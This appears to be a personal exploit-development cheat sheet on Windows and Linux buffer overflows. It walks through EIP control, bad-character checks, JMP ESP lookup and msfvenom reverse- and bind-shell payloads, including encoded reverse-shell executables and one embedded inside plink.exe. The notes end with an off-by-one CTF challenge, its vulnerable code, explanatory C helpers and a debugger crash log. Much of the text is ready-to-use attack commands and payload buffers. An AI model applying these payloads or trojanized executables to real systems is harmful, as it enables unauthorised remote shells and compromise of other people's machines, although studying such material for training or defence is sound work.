BufferOverflows
Buffer Overflow
Windows Buffer Overflows
- Test for controlling EIP
  - pattern_create.rb -l 2700
  - pattern_offset.rb -q 39694438
- Verify EIP location
  - buffer = "A" * 2606 + "B" * 4 + "C" * 90
- Check for "bad characters"
  - Add the bad characters and see if EIP is still controlled, i.e. \x00 - \xFF
- Use Mona to determine a module that is unprotected
- Bypass DEP if present by finding a memory location with read and execute access for JMP ESP
- Use NASM to determine the hex code for a JMP ESP instruction
  - /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
    nasm > JMP ESP
    00000000  FFE4              jmp esp
- Run Mona in the Immunity log window to find the FFE4 (JMP ESP) opcode
  - !mona find -s "\xff\xe4" -m slmfc.dll
  - found at 0x5f4a358f; flip around for little-endian format:
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
- MSFVenom to create payload
  - msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
- Final payload with NOP slide
  - buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
- Create a PE reverse shell
  - msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
- Create a PE reverse shell and encode 9 times with shikata_ga_nai
  - msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
- Create a PE reverse shell and embed it into an existing executable
  - msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
- Create a PE reverse HTTPS shell
  - msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
Linux Buffer Overflows
- Run Evan's Debugger (edb) against the app
  - edb --run /usr/games/crossfire/bin/crossfire
- ESP register points toward the end of our buffer, so jump through EAX instead (opcodes from nasm_shell.rb):
  - nasm > add eax,12
    00000000  83C00C            add eax,byte +0xc
    nasm > jmp eax
    00000000  FFE0              jmp eax
- Check for "bad characters"
  - Add the bad characters and see if EIP is still controlled, i.e. \x00 - \xFF
- Find JMP ESP address
  - "\x97\x45\x13\x08"  # found at address 08134597
  - crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
  - msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
- Connect to the shell with netcat:
  - nc -v $ip 4444
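Both sections above rely on two calculations that the notes only show the result of: the offset 2606 that pattern_offset.rb derives from the value 39694438 read out of EIP, and the little-endian byte flip that turns an address such as 0x5f4a358f into "\x8f\x35\x4a\x5f" (or 08134597 into "\x97\x45\x13\x08"). The following is an added example written for these notes, not code from the notes or from Metasploit; the function names are my own.

```c
/* Added example, not part of these notes or of Metasploit: how
 * pattern_offset.rb arrives at 2606 for EIP = 0x39694438, and how an
 * address is flipped into the little-endian form placed in the buffer. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Fill buf with the Metasploit-style cyclic pattern Aa0Aa1...Zz9: 3-char
 * units, so every 4-byte window is unique within 20280 bytes. Returns the
 * number of bytes written (at most len). */
size_t pattern_create(char *buf, size_t len) {
    size_t n = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char unit[3] = { u, l, d };
                for (int k = 0; k < 3; k++) {
                    if (n == len) return n;
                    buf[n++] = unit[k];
                }
            }
    return n;
}

/* Byte i (0 = least significant) of v: the order an x86 address is written
 * into the buffer, e.g. 0x5f4a358f -> 8f 35 4a 5f. */
unsigned char le_byte(uint32_t v, int i) { return (unsigned char)(v >> (8 * i)); }

/* Equivalent of pattern_offset.rb -q <eip>. The four pattern characters that
 * overwrote the saved return address were read back from EIP as a
 * little-endian integer, so the needle is the byte-flipped value.
 * Returns the offset into a pattern of length len, or -1 if not present. */
long pattern_offset(uint32_t eip, size_t len) {
    char *buf = malloc(len);
    if (!buf) return -1;
    size_t n = pattern_create(buf, len);
    unsigned char needle[4];
    for (int k = 0; k < 4; k++) needle[k] = le_byte(eip, k);
    long found = -1;
    for (size_t i = 0; i + 4 <= n; i++) {
        if (memcmp(buf + i, needle, 4) == 0) { found = (long)i; break; }
    }
    free(buf);
    return found;
}
```

pattern_offset(0x39694438, 2700) returns 2606, the value used in the Windows buffers; an address whose bytes are not alphanumeric, such as 0x08134597, returns -1 because it can never have come from the pattern.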
One Byte Overflow
Vulnerable Code:
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct B2 {
    int (*ptr)();
    char c[128];
};

struct B1 {
    char data[16];          // 16-byte buffer, immediately followed by the pointer
    struct B2 *myStruct;
    char data2[128];
};

void secret() {
    printf("Game 0ver! You win :P\n");
}

void function() {
    printf("Everything is fine.\n");
}

int main(int argc, char *argv[]) {
    printf("\033[1mWelcome to ROPLevel7 by @bellis1000!\nThis level involves exploiting an off-by-one vulnerability.\n\n\x1b[0m");
    if (argc < 3) {
        printf("Usage: %s <data> <block_data>\n", argv[0]);
        exit(0);
    }
    struct B1 *s = malloc(256);
    s->myStruct = malloc(256);
    s->myStruct->ptr = function;
    strncpy(s->myStruct->c, argv[2], 126);
    strncpy(s->data2, argv[2], 126);
    // this is where the off-by-one bug occurs: i reaches 16, one past data[15]
    for (int i = 0; i <= 16; i++) {
        if (argv[1][i] != 0) {
            s->data[i] = argv[1][i];
        } else {
            break;
        }
    }
    // call function pointer
    s->myStruct->ptr();
    return 0;
}
```
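Why a single extra byte is enough here, and what the fixed loop looks like, as an added example (my code, not part of the ROPLevel7 challenge by @bellis1000; the function names are my own): data[] is 16 bytes and myStruct sits directly behind it, so the write at index 16 lands on the lowest byte of the pointer, and bounding the loop by the array size removes the bug.

```c
/* Added example, not part of the ROPLevel7 challenge code: confirms the
 * layout that lets data[16] alias the first byte of myStruct, and shows a
 * copy loop bounded by the array size. Function names are my own. */
#include <stddef.h>
#include <stdlib.h>

struct B2 { int (*ptr)(void); char c[128]; };
struct B1 { char data[16]; struct B2 *myStruct; char data2[128]; };

/* Byte offset of myStruct inside B1: 16, because char[16] is followed by
 * the pointer with no padding, so index 16 of data[] is the pointer's
 * lowest byte on a little-endian machine. */
size_t pointer_offset(void) { return offsetof(struct B1, myStruct); }

/* One-past-the-end of data[] is exactly &myStruct: this is the byte the
 * challenge loop writes when i == 16. */
int overflow_hits_pointer(void) {
    static struct B1 s;
    return (void *)(s.data + sizeof s.data) == (void *)&s.myStruct;
}

/* Fix: bound the index by the array size instead of a hand-written constant
 * (the original used "i <= 16" for a 16-element array). As in the original,
 * data[] is not NUL-terminated when the input fills it. Returns bytes copied. */
size_t safe_copy(struct B1 *s, const char *src) {
    size_t n = 0;
    while (n < sizeof s->data && src[n] != '\0') {
        s->data[n] = src[n];
        n++;
    }
    return n;
}

/* Feed the 17-byte "A" input from the debugger run to the fixed loop and
 * check that myStruct is untouched. Returns 1 on success, 0 otherwise. */
int pointer_survives(void) {
    struct B1 *s = calloc(1, sizeof *s);
    struct B2 sentinel = { 0 };
    if (!s) return 0;
    s->myStruct = &sentinel;
    size_t n = safe_copy(s, "AAAAAAAAAAAAAAAAA");  /* 17 x 'A', one too many */
    int ok = (n == 16) && (s->myStruct == &sentinel);
    free(s);
    return ok;
}
```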
Exploit Code:
- gcc -fno-stack-protector -o roplevel7 roplevel7.c
- Run under pwndbg with 17 bytes of "A" as <data> and a long run of "B" as <block_data>; the crash below shows RIP filled with 0x42 ("B") bytes:
pwndbg> run AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Starting program: /home/generalzero/Downloads/Exploit-Challenges-master/ROPLevel7/roplevel7 AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
pwndbg> Welcome to ROPLevel7 by @bellis1000!
This level involves exploiting an off-by-one vulnerability.
Breakpoint 1, 0x00005555555552cb in main ()
c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0000004242424242 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────────────
RAX 0x0
RBX 0x0
RCX 0x41
RDX 0x4242424242
RDI 0x55555555973f ◂— 0x42424242424242 /* 'BBBBBBB' */
RSI 0x7fffffffe170 ◂— 0x4242424242424242 ('BBBBBBBB')
R8 0x7
R9 0x7ffff7f8ba60 (main_arena+96) —▸ 0x5555555598c0 ◂— 0x0
R10 0x18
R11 0x7ffff7f51d80 ◂— 0xfff1c580fff1c570
R12 0x555555555080 (_start) ◂— endbr64
R13 0x0
R14 0x0
R15 0x0
RBP 0x7fffffffdc60 —▸ 0x5555555552e0 (__libc_csu_init) ◂— endbr64
*RSP 0x7fffffffdc38 —▸ 0x5555555552cd (main+302) ◂— mov eax, 0
*RIP 0x4242424242
─────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────────
Invalid address 0x4242424242